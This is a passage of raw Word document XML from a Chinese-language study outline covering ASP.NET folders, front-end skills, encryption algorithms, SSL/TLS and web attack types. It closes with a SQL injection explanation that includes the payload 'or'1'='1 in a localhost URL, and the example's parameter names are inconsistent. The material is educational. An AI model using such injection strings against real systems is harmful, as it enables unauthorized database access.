          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>移动设备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>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默认隐藏段（拒绝客户端访问）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>App_Browsers：包含浏览器定义(.browser文件),ASP.NET会使用这些文件来识别个别浏览器并判断它们的功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>App_Code：包含用于公用程序和商务对象(Business Object) , (例如, .cs ; .vb和.jsl文件)的程序源代码,要将它编译为应用程序的一部分</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>App_Data：包含应用程序数据文件.包括MDF文件,XML文件与其他数据库文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>App_GlobalResources：包含资源(.resx和.resources文件),这些资源会编译成具有全局范围的组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>App_LocalResources：包含资源(.resx和.resources文件),这些资源会与特定的页面,拥护控件或应用程序的主页面(MasterPage)相关联</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>App_WebReferences：包含参考合约文件(.wsdl文件),结构描述(.xsd文件)和探索文件(.disco和.discomap文件),可定义Web应用以用语应用程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bin：包含空间,组件或你要在应用程序中应用其他程序代码的已编译组件(.dll文件).在[Bin]文件夹中以程序代码表示的任何类, 都会自动在应用程序中应用到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web.config：用来储存Asp.net Web应用程序的配置信息，通过继承关系，每个Web.config将配置设置应用到它所在的目录及虚拟子目录下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>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特殊目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bin：是二进制binary的英文缩写,用来存放编译的结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Debug 调试版本 开发环境 有调试信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Release 发行版本 代码更小,执行更快,编译更严格,更慢 没有调试信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Obj：是object的缩写，用于存放编译过程中生成的中间临时文件,用来加快编译速度</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Release</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需要掌握的前端知识</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Html5+Css3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JQuery插件语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Js实现封装-继承-多态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现一个简单的MVVM框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现一个简单的js模板引擎</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Angular</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>路由、模块化、控制器、指令、作用域、模板、链式函数、过滤器、服务、依赖注入...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟DOM，组件化...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>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信息加密技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单向散列加密（杂凑函数、Hash函数）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MD5，SHA，MAC，CRC...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对称加密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用的密钥(yue)只有一个，发收信双方都使用这个密钥对数据进行加密和解密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="118"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DES，3DES，AES，TDEA，Blowfish，RC5，IDEA...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>非对称加密（公私钥加密）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指加密和解密使用不同密钥的加密算法，分公钥和私钥</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RSA，Elgamal，背包算法，Rabin，D-H，ECC...</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SSL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Secure Socket Layer，安全套接字层,保护Web通讯,以实现客户端和服务器之间的安全通讯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTPS：是在HTTP上建立SSL加密层，并对传输数据进行加密，是HTTP协议的安全版</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Let's Encrypt,国外一个公共的免费SSL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>StartSSL,被各大浏览器所支持,但只免费一年</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="90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TLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Transport Layer Security，安全传输层协议，用于在两个通信应用程序之间提供保密性和数据完整性，建立在SSL 3.0协议规范之上，是SSL 3.0的后续版本</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Web安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>渗透注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sql注入、命令表达式注入、SSRF注入、XSS注入、CSRF注入、XXE注入...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>假设我们在浏览器中输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx</w:t>
      </w:r>
      <w:r>
        <w:t>，由于它只是对页面的简单请求无需对数据库动进行动态请求，所以它不存在SQL Injection，当我们输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1</w:t>
      </w:r>
      <w:r>
        <w:t>时，我们在URL中传递变量testid，并且提供值为23，由于它是对数据库进行动态查询的请求（其中?testid＝23表示数据库查询变量），所以我们可以该URL中嵌入恶意SQL语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>现在我们要通过页面请求的方式，让数据库执行我们的SQL语句，我们要在URL中嵌入恶意表达式1=1（或2=2等等），如下URL所示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or'1'='1</w:t>
